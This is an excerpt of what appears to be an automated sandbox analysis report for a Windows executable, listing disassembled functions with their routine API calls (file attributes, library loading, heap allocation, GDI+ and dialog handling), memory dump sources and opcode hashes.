API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: f109bc22b5b98ee6827288b7d4b3d95056ef994ccd269a687f1e864af3a04909
Instruction ID: 6c30e29f69c3667601c17ebc3a152e9887fc91b63f382aecbcb37faf417214d5
Opcode Fuzzy Hash: f109bc22b5b98ee6827288b7d4b3d95056ef994ccd269a687f1e864af3a04909
Instruction Fuzzy Hash: E7F0B471A11308AACB11FB79DD16EEF7BBCDB09304F440052B202E3292DA74AA05CBB1

Function 00D9BCDD Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00D9BCD4,?,00D98607,?), ref: 00D9BCFA

Part of subcall function 00D9DA1E: _wcslen.LIBCMT ref: 00D9DA59

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,00D9BCD4,?,00D98607,?), ref: 00D9BD24

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: b0feaa2efd473222b20349052f17c7acab105a8cc1f1860f97a05557426e91e9
Instruction ID: b10d4e1963898d7a7cc1f451964c0b99114ac5fdc7db64c7da860d50c0064071
Opcode Fuzzy Hash: b0feaa2efd473222b20349052f17c7acab105a8cc1f1860f97a05557426e91e9
Instruction Fuzzy Hash: 75F0B435600218ABCB10EB789D019FEB3BCEB4D760F050165FA02E3280DB70DD4186B0

Function 00DA3184 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,00DA31C7,00D9D526), ref: 00DA3191
GetProcessAffinityMask.KERNEL32(00000000,?,00DA31C7), ref: 00DA3198

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: ec132e8595e4a97ffc9aca5f9872c5f0bc5bbbfd1d6f47466ad12440e80b66cd
Instruction ID: 6e6a930e57e87fd85eea05ab49178682407a929f92c753ec5fb015a0294da619
Opcode Fuzzy Hash: ec132e8595e4a97ffc9aca5f9872c5f0bc5bbbfd1d6f47466ad12440e80b66cd
Instruction Fuzzy Hash: B7E04872F10306679F098BA49C059EB73DEDA452597144579B513E3300F974DE0557B4

Function 00DA28AB Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DA28D4
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DA1309,Crypt32.dll,00000000,00DA1383,00000200,?,00DA1366,00000000,00000000,?), ref: 00DA28F4

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 2552a5149d442f00b466ca9d859f811498143187ff2aa4f1cfe4c71bfd7d2d24
Instruction ID: 814150c0521219a65cf566963d2013061440b5e376fc73ef31623b69463605c4
Opcode Fuzzy Hash: 2552a5149d442f00b466ca9d859f811498143187ff2aa4f1cfe4c71bfd7d2d24
Instruction Fuzzy Hash: 70F0BE35A00209ABCB10EB69CC04EEFB3FCEF49741F10006AB606E3200CA74EA858A74

Function 00DA05C8 Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00D97BEB,?,00D91436,00D97BEB), ref: 00DA05F8
LoadStringW.USER32(00D97BEB,?,00D91436), ref: 00DA060F

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 3ca3352d1bcdc55cb8d3a0ba8422ec90d2ab7e3535489191d907bef9439876e2
Instruction ID: 358790f0999c36f78c3a524869d7058ef49fbdb96cc1a73b018292c941d14f50
Opcode Fuzzy Hash: 3ca3352d1bcdc55cb8d3a0ba8422ec90d2ab7e3535489191d907bef9439876e2
Instruction Fuzzy Hash: A4F07F35201219BB9F111F51EC089FA7F6AFF4A395B089426FD0896225D6328960EBB0

Function 00DACD3F Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00DC505D,000000FF), ref: 00DACD7D
OleUninitialize.OLE32(?,?,?,?,00DC505D,000000FF), ref: 00DACD82

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: d5a00371511241c725ee730fed7b187b72e85c9ba222d19b5875c4fd9307629a
Instruction ID: 55608a3140d8547730b036632964c709c8deec76fafcc7c5985f5ede8920ac3b
Opcode Fuzzy Hash: d5a00371511241c725ee730fed7b187b72e85c9ba222d19b5875c4fd9307629a
Instruction Fuzzy Hash: 06F05E76604645EFC700DF19DC01F9AFBA8FB49B20F00826BE816C3760DB34A900CAA4

Function 00DAC34D Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DAC36E
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00DAC375

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 7f3880521388d9a683eb976b3ee26be058ff1eb66f8a0480b70fe3679e4cbbc6
Instruction ID: 9d0a5412e579d5c5827df0eac52727618805e62ba6ca87994d4e21f2c9f952e4
Opcode Fuzzy Hash: 7f3880521388d9a683eb976b3ee26be058ff1eb66f8a0480b70fe3679e4cbbc6
Instruction Fuzzy Hash: 72E0ED75915258EBCB10EF95C541BD9B7F8EB05360F10C05EE89693201D770AE449F71

Function 00DB51AC Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DB51CA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00DB51D5

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 08e9ecf4097f204e7f106573affef99f85edb9e45226dacd142a83fe5f228cfc
Instruction ID: 347776bb634fe9c88e4d841faee0b068e7abeef6ac695f511a07ce7e3e76f4b6
Opcode Fuzzy Hash: 08e9ecf4097f204e7f106573affef99f85edb9e45226dacd142a83fe5f228cfc
Instruction Fuzzy Hash: 20D0A724D44B00D85C10367838027EA3750D9117F43B01646E423896C9DE15C4445131

Function 00D91341 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00D91356
ShowWindow.USER32(00000000), ref: 00D9135D

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: ccc86773b9d6dde70334b665f12725420f714ca2f0690674742cbb1ed11c31f9
Instruction ID: d0efe6902958b76319f8857a8dc94e25e087fd04a3fe9776aa130d2bf7d4545e
Opcode Fuzzy Hash: ccc86773b9d6dde70334b665f12725420f714ca2f0690674742cbb1ed11c31f9
Instruction Fuzzy Hash: A5C0123205C300BECB010BB0EC09CBABBA8ABA4212F10CA08F0A6C11A0C239C024DB21

Function 00D91B63 Relevance: 1.8, APIs: 1, Instructions: 311COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D91B6A

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 69424f3ac292edeb5045d6caef089b48130fc5598a7258b8d3bbbeca8f44e306
Instruction ID: 35d9206732927fb4c22dddad332d1365573461a10274bef5fe3cefb1df57cda2
Opcode Fuzzy Hash: 69424f3ac292edeb5045d6caef089b48130fc5598a7258b8d3bbbeca8f44e306
Instruction Fuzzy Hash: 8BC18378A042569FDF25CF24C484BA9BBA5AF1A310F1C01B9EC06DB396CB35DA44CB71

Function 00D9147C Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D91483

Part of subcall function 00D96AE8: __EH_prolog3.LIBCMT ref: 00D96AEF

Part of subcall function 00D9EE0F: __EH_prolog3.LIBCMT ref: 00D9EE16

Part of subcall function 00D9668F: __EH_prolog3.LIBCMT ref: 00D96696

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: e42a9ec3d03d5eef0981017a3d9436dd833facfb0e92c24356b307a726d4b157
Instruction ID: 0fa8ce281ea55c02f6ca40d5017b0b7cddb944839ce067f3ef190d6417e94c5e
Opcode Fuzzy Hash: e42a9ec3d03d5eef0981017a3d9436dd833facfb0e92c24356b307a726d4b157
Instruction Fuzzy Hash: 1D4124B5A0A3808ECF14DF6994812D97BE2AF59300F0805BEEC5DCF29AD7715215CB72

Function 00DA5617 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00DA561E

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 64b01f4a1a78c86de4d6c866440b8ff6aab8157b1640b3bdf024bde9707545e5
Instruction ID: cae204e6c0bfda1f0a65769d8094a29585de1f69ab3855c6b365bb089503db30
Opcode Fuzzy Hash: 64b01f4a1a78c86de4d6c866440b8ff6aab8157b1640b3bdf024bde9707545e5
Instruction Fuzzy Hash: 8B21D6B5E41612DFDB14EFB4DC4276A76A8FB05314F48023AE506EB286D7B09900C7B9

Function 00DBD2E8 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00DBD348

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: de7d8a7b7d1e0172bcfdc350fbb124a0efb7b824bf86a6cbe784d2c259778f2f
Instruction ID: 124ca48b9c247267ec2c139adbbdeb370688f33e729b1df6aef2ac4e8e2c69c8
Opcode Fuzzy Hash: de7d8a7b7d1e0172bcfdc350fbb124a0efb7b824bf86a6cbe784d2c259778f2f
Instruction Fuzzy Hash: D111A733A01625EB9B259E29EC409EE73D7EB8536071A4221ED16EB355E631EC0186F2

Function 00DBEAC9 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00DBD786: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DBB9D3,00000001,00000364,?,00DB688D,?,?,00DD50C4), ref: 00DBD7C7

_free.LIBCMT ref: 00DBEB35

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction ID: 9f8637919bc6a71f20eb489ef3780fd4cda927d9f81ff475d32993e3c9abad4b
Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction Fuzzy Hash: F601D672600345ABE325CF69D881DDAFBEDFB85370F25051DE59683280EA70A805C678

Function 00D9AB81 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D9AB88

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 818587ba038f6af61dba0df71033380335de82cf8f1c2e6a12f9d214563720bf
Instruction ID: bbe7bc5a359fbc991bcf22edae02971542a1dfde1c3be542001de4ae6ff2cf7f
Opcode Fuzzy Hash: 818587ba038f6af61dba0df71033380335de82cf8f1c2e6a12f9d214563720bf
Instruction Fuzzy Hash: 6401613690062A9BCF25AF688892AAEB376EF44704B054519FD11AB241CB348C00C6F5

Function 00D9EE0F Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D9EE16

Part of subcall function 00D96AE8: __EH_prolog3.LIBCMT ref: 00D96AEF

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: fdfcf110d28f60035d3180b48ea1b2532a423d0bdeb6bfeb1a6da69202c90bec
Instruction ID: 7f4bf1667d765160a9dd75dfb8fc95f658747e22046323c8f00b5716707b7642
Opcode Fuzzy Hash: fdfcf110d28f60035d3180b48ea1b2532a423d0bdeb6bfeb1a6da69202c90bec
Instruction Fuzzy Hash: 21019E64A04340CAEF11EBB999167AEBBE0AF44300F54485DE486E7382EE748B00C775

Function 00DBD786 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DBB9D3,00000001,00000364,?,00DB688D,?,?,00DD50C4), ref: 00DBD7C7

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7f08bee6f0e703b0b7839a0269020a985ffce9cfe06301125c23a219865a1900
Instruction ID: 61f0e84e10d53f6234ec6b2bee47a899e5c70153b425a4460e0380ece659ce81
Opcode Fuzzy Hash: 7f08bee6f0e703b0b7839a0269020a985ffce9cfe06301125c23a219865a1900
Instruction Fuzzy Hash: 2BF0B431200721E79B216E769C41BDB778ADF40770F184052E807D6695EE60DC0082F5

Function 00D96AE8 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00D96AEF

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: e083e9e6eb3b08f34592aaf36c64416dc21043375d016343f0a072c8b652f16d
Instruction ID: 622aa71d0fe06020a0077399acdd933d8857daf3159e8874d0ef7d19eddb5639
Opcode Fuzzy Hash: e083e9e6eb3b08f34592aaf36c64416dc21043375d016343f0a072c8b652f16d
Instruction Fuzzy Hash: C9F068B5A41701EAD731EB608853FDF7AE8EF84B04F800419B25AA72C3DBB053048679

Function 00DBBC8E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 06982c0876210ee6d64f1c79b5f908cf646cf6e733eec8ef9544c69ef43d2657
Instruction ID: f04852a69881030670ae7646134034ddf0bc982569ce542a1c1b3c7d87e08d6f
